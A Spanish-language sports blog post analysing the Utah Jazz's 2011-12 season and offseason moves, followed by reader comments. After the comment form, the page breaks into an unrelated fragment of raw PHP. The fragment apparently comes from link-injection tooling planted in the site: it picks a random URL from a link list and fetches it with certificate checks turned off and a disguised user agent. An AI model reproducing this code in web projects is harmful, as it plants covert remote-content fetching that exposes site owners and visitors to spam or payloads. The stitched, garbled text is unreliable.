Utah Jazz: Notable

10 de July de 2012 por TheDeerHunter

Es una cuestión de genes. Hay algo en el agua de la Ciudad del Lago Salado, bastión mormón, que hace que los balances positivos y la postemporada para los Jazz sea como el valor en la mili. Se presupone.

No es trivial, como podría parecer. Tras el final del lockout no todo el mundo hubiera apostado sus ahorros a que terminarían clasificándose como uno de los 8 mejores equipos del Oeste por primera vez tras la era Sloan. Aparentemente no tenían más opciones que Blazers, Rockets o Suns. Con un núcleo mayoritario de chavales de hasta dos años de experiencia en la liga no tenían obligación moral de alcanzar la postemporada, más allá de lo que significa enfundarse esa camiseta.

No nos colgaremos medallas por nuestro análisis inicial. Fue escrito tras alguna que otra semana de partidos y por aquel entonces ya se apreciaban maneras. Una de las sensaciones positivas, decíamos, pero ni por esas teníamos claro el 50% de victorias ni la postemporada. Al final superaron ampliamente nuestras expectativas, principalmente porque se logró de forma brillante, con uno de los 4 mejores ataques de toda la liga.

Para empezar, excelente trabajo de Tyron Corbin. Hay vida más allá de Jerry Sloan y, oh sorpresa, se puede ganar defendiendo como gatitos. Para mí, su gran mérito es la gestión de sus activos más jóvenes, amortizada con la eclosión de Derrick Favors y el desarrollo más gradual de Gordon Hayward y Alec Burks. En el debe hay que apuntarle los casos de Enes Kanter o Jeremy Evans, que aún no han encontrado su sitio. Eso sí, alguna vez este equipo tendrá que ponerse a defender y a mejorar su efectividad en el lanzamiento lejano. Son aspectos que veremos cómo evolucionan con el tiempo. Creo que se ha ganado margen de confianza para seguir trabajando en ello.

Otro aspecto a destacar es el alto rendimiento que ha desplegado la dupla Al Jefferson-Paul Millsap. Estamos hablando de la que quizá ha sido la pareja interior más potente de la liga, o al menos la más determinante para los intereses de los suyos. Por desgracia, sus características y la figura de Favors marcan ciertas limitaciones para la franquicia. Uno de los tres puede sobrar.

En lo mejorable no se ha recuperado la mejor versión de Devin Harris que abandona el proyecto sin pena ni gloria. Recordemos que llegó a ser all-star en el 2009, puro espejismo. No me cabe duda de que Mo Williams, como mínimo, igualará el resultado.

Tampoco se ha encontrado un sustituto real a Raja Bell como el bombardero que llegó a ser. Hayward y Burks tienen muy buena pinta pero necesitan mejorar. Sorprende un poco que para potenciar la peligrosidad más allá de la línea se haya fichado a Marvin Williams. ¿Jugón?

Lo mejor: Vivir la experiencia de playoffs. Experimentar el juego ofensivo en Utah. Tyron Corbin. El formidable frontcourt formado por Favors-Millsap-Jefferson.

Lo peor: La paliza que se llevaron en primera ronda. Una defensa impropia de la herencia. Devin Harris antes molaba.

Jugando a GM:

Los Jazz se han movido rápido. Mo y Marvin Williams son correctos refuerzos pero no les quitará ni de pobres ni de ricos. Tampoco deben echar de menos demasiado a Harris por lo que ha rendido allí.

– Me plantearía el traspaso de Paul Millsap. Cuenta con un cartel excelente en la liga y resulta relativamente redundante teniendo a Jefferson, Favors y Kanter. Preferiblemente se debe reforzar el perímetro y el banquillo. También cuentan con la mid-level para ello aunque según se comenta no van a emplearla en un único jugador.

– No renovaría a Josh Howard.

– Hay cierto interés por Chris Kaman. Podría resultar útil en esa mejora defensiva pero no me parece una pieza prioritaria y supondría la sentencia para Kanter.

Comenta

8 comentarios a esta entrada

  1. melo15 dice:
    #1

    Traspasariais a Milsap?? Tanto confiais en Derrick Favors?
    A pesar de tener a Month Williams, no creo que sea un base de playoffs.
    PD: Gran analisis Deer.

      Citar

  2. txusma dice:
    #2

    melo15:
    Traspasariais a Milsap?? Tanto confiais en Derrick Favors?
    A pesar de tener a Month Williams, no creo que sea un base de playoffs.
    PD: Gran analisis Deer.

    Diría que más de una vez has mencionado a Favors como decepción y a mi no me lo parece. 2º año en la liga y 8’8 puntos, 6’5 rebotes, 1’7 tapones y 1 robo con un 50% en tiros de campo en poco más de 20 minutos. En playoffs jugó 29 minutos y se fue a los 12 puntos y 9’5 rebotes. Ha de mejorar todavía muchas cosas (pérdidas, asistencias) pero creo q puede convertirse en todo un bastión defensivo. Y leches que tiene 20 años! Despacito y buena letra.

    Y como mola Gordon Hayward.

      Citar

  3. Ru dice:
    #3

    Ya solo con el cambio Devin Harris-Mo Williams mejora el equipo respecto a la temporada pasada.Veremos,porque es una temporada importante para ellos aunque parezca que no porque quitando Faors,Kanter,Hayward y Burks el resto del equipo no tiene contrato el año que viene,creo que es un hecho que merece la pena remarcar.

    Y sobre Kanter,primer partido de la Summer League,3 puntos y 5 rebotes en 28 minutos.Así no se gana el puesto

      Citar

  4. Nacho dice:
    #4

    txusma:

    Y como mola Gordon Hayward.

    Mola mogollón. Es cierto que se desinfló en PO, pero eran sus primeros, y él lo asume.
    Ha jugado partidazos en la RS. Su progresión de Rookie a 2º año ha sido muy buena (cierto que no jugó mucho el primer año) Y tiene manera de líder, de esos que lo son porque te encuentras a gusto a su lado, no porque vaya de superstar. Creo que tiene un futuro de la leche. Creo que es de los tíos que se convierten en jugador franquicia aunque no sea primer espada en toda su carrera. Veremos en 10 años. Pero para mí el intocable de Utah.
    Se podría traspasar a Milsap, pero, ¿a cambio de qué?
    A ver en que queda Kanter, pero creo que es un tío que puede crecer mucho. ¿Contemplan los equipos NBA ceder jugadores a Europa? Porque este tío podría crecer mucho en un equipo medio de Euroliga, tipo Prokom o Alba Berlín, te aseguras partidos claves contra Barça, CSKA, griegos e italianos etc… O pasará con él como con Hayward?

      Citar

  5. Sancho88 dice:
    #5

    Coincido en que deben traspasar a Millsap y darle los galones a Favors junto a Jefferson, una gran pareja ofensiva, y deberían serlo atrás también, por intimidación, tapones, etc. Recordemos que Kanter es muy joven, que ha ido allí prácticamente sin haber jugado al baloncesto jamás, solo por actuaciones sobresalientes en alguna reunión de futuras estrellas, y que está aprendiendo a marchas forzadas. Condiciones las tiene todas, ya lo demostró en el pasado Eurobasket de Lituana; se pelea por los rebotes muy bien y en la zona es una fuerza de la naturaleza, ahora bien, tiene que aprender a entender el juego, necesitan hacer un trabajo individual muy importante con él, a ver cómo evoluciona este año. A priori esos tres son jugadores muy interesantes, Kaman podría encajar también a la perfección, y por fuera yo diría que Hayward y Burcs crecerán mucho este año, que Mo Williams al menos aportará el doble que Devin Harris, y que este año los Jazz empiezan siendo favoritos a Playoffs desde el principio a menos que se demuestre lo contrario. Como bien dices Deer, algo tiene ese lago… pero lo llevan metido en los genes estos tíos. Supongo que el Energy Solutions tb. debe ayudar…

      Citar

  6. lost dice:
    #6

    txusma:
    Y como mola Gordon Hayward.

    Mola mucho, pero su rendimiento bajó en PO(recordemos que jugaban contra SA). La acción en Boston que mete dos tapones, el primero al estilo LeBron… puro Gordon.

      Citar

  7. dunc dice:
    #7

    lost: Mola mucho, pero su rendimiento bajó en PO(recordemos que jugaban contra SA). La acción en Boston que mete dos tapones, el primero al estilo LeBron… puro Gordon.

    Para mi es la acción más espectacular de este año junto con el mate de Griffin sobre Perkins

      Citar

  8. Esteban dice:
    #8

    bien en analisis, a ver

    yo no traspasaria a millsap, por el contrario si traspasaria a kanter, quien todavia tien un buen nombre en la liga y lo usaria como moneda antes de que lo pierda, otro año mas como el pasado y empezara a ser visto como un pivot suplente de 10 a 15 min por partido… se cree q tiene un potencial mayor, aun no lo mostro y la verdad no me gusta para nada ese fisico

    dan un gran salto como Mo como base, y apuestan con fuerza por williams, cualidades fisicas parece tener, si logran sacarle algun jugo, puede hasta vale la pena, por mi parte no termino de entender que vieron en el para asumir su contrato, lo cierto igual, es que la posicion del alero la tenian floja y williams es una especie de joven veterano con muchos PO encima que puede ayudar a mediano/largo plazo a los jovenes con los que cuenta el jazz

    no cambiaria muchas mas cosas, por el hecho de que sus jugadores son infravalorados y nadie les pagara por ellos como corresponde, quien se anima a aventurar un trade por millsap? donde esta el valor de este tio? juega al nivel all-star, pero su valor de mercado esta casi en un sexto hombre, similar lo de jefferson, por lo tanto yo me los quedaria

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>